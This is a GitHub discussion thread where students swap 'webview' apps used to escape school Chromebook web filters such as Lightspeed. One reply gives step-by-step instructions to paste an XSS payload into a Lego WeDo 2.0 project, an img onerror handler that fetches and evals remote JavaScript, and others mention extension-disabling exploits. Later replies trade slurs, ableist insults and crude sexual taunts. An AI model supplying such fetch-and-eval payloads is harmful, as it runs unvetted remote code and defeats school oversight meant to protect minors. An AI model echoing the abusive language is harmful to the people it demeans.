### DISCUSSION TITLE
Web View

### DISCUSSION THREAD

**Discussion by ihateni** [3kh0/ext-remover#1072] [Help JOIN TITANIUM NETWORK TO SHARE PLEASE] [answered]
Does anyone know a new webview besides skiovox and sparkvue? I cant find any webview glitches

**Comment by Averagedude69420** [comment]
there were a bunch of them like geogebra, my homework helper, time tracker, etc they all have been removed at my school but it might not be blocked for you. If your school has apps that can be downloaded from google play many of those apps can be used to bypass restrictions.

**Reply by ihateni** [reply]
My school blocks nearly everything besides stuff on the "Education" tab also google play just has an error for everything saying "We're sorry, the requested URL was not found on the server"

**Reply by Averagedude69420** [reply]
damn does your school have big ideas math installed?

**Reply by Averagedude69420** [reply]
I'd recommend to just downgrade to the lowest possible version and use one of the disable extensions exploit

**Reply by ihateni** [reply]
Nah they have lightspeed and my school blocked the downgrading sites and disabled bookmarklets

**Reply by Blobby-Boi** [reply, marked as answer]
List of webviews that I know of:

chrome://chrome-signin
Lego WeDo 2.0
SparkVUE
Geogebra Classic
S2Bot4Scratch
McMillan learning ebook
Droneblocks
myHomework student planner
3Dview
Coding with chrome
Mackinvia
Ipevo Whiteboard
TestNav

**Reply by ihateni** [reply]
I found ur webview that one is the one that works since sparXSS got patched

**Reply by Blobby-Boi** [reply]
ye

**Reply by LizzyEll** [reply]
@Blobby-Boi Lego WeDo 2.0 webstore?

**Reply by Blobby-Boi** [reply]
yes

**Reply by Blobby-Boi** [reply]
If you are interested I can provide steps for it

**Reply by LizzyEll** [reply]
that's what I meant.. sorry for not clarifying.

**Reply by Blobby-Boi** [reply]
go to lego wedo 2.0 and make a project. On the top click the pencil. Then choose the green document icon. In the textbox paste the folloiwng code in:
`<img src=# onerror='fetch("https://raw.githubusercontent.com/Blobby-Boi/BlobbypassXSS/main/main.js").then(r=>r.text()).then(c=>eval(c)) '>`

**Reply by jeffrey6576i** [reply]
@Blobby-Boi geogebra?

**Reply by akabutnicer** [reply]
> @Blobby-Boi geogebra?

did he...say geogebra?

**Reply by schoolexploitkid** [reply]
geogebra is patched

**Reply by jeffrey6576i** [reply]
ah ok

**Reply by jeffrey6576i** [reply]
> > @Blobby-Boi geogebra?
> 
> did he...say geogebra?

you can fucking read @akabutnicer

**Reply by akabutnicer** [reply]
retard im referring to @Blobby-Boi

**Reply by jeffrey6576i** [reply]
> retard im referring to @Blobby-Boi

good boy

**Reply by akabutnicer** [reply]
alright since your autistic flare-ups are occurring more frequently than usual, I'll break it down in simple words you can comprehend. i ask you to read very carefully as i'm aware your brain can't handle multiple words at once. YOU asked "geogebra?", and in response (this is where I get technical so focus up), I asked if Blobby's message included geogebra. now, you may or may not have heard of this, but what I used there is a common form of **sarcasm**. in using this method you then had to look back at the message @Blobby-Boi sent and realize you're a retard for not being able to read. and this is where I slightly contradict myself. in the potential scenario where you were rather ASKING for the run-down on the GeoGebra exploit, it'd be preferable if you would ask in TN with the other degenerates

**Reply by akabutnicer** [reply]
also in any case which the "6576i" in your name represents your device processor, stop flexing what daddy (me) bought you; I told you that once before

**Reply by jeffrey6576i** [reply]
i aint reading all that

**Reply by akabutnicer** [reply]
fair, just know this: you werent my proudest nut

**Reply by jeffrey6576i** [reply]
NOOOOOOO

**Reply by jeffrey6576i** [reply]
i will try harder

**Comment by ghost** [comment]
#1276

**Reply by kjohnson0259-crypto** [reply]
bro somebody help they took down we do any more sites?

**Reply by S-PScripts** [reply]
join titanium network for lots of shit there

**Reply by drakefenwick123-beep** [reply]
67
